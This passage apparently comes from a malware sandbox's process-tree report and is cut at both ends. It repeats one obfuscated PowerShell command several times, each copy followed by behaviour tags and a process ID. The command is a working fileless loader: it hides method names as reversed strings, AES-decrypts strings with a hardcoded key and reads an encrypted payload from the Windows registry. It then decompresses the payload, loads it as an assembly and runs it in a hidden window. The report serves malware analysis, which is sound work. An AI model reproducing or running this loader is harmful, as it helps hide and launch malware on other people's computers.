'')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                          6⤵
                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Hide Artifacts: Hidden Window
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5032
                                                                                                                        • C:\Windows\$sxr-powershell.exe
                                                                                                                          "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1200).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                          6⤵
                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Hide Artifacts: Hidden Window
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4564
                                                                                                                        • C:\Windows\$sxr-powershell.exe
                                                                                                                          "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1200).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                          6⤵
                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Hide Artifacts: Hidden Window
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3264
                                                                                                                        • C:\Windows\$sxr-powershell.exe
                                                                                                                          "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1200).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, 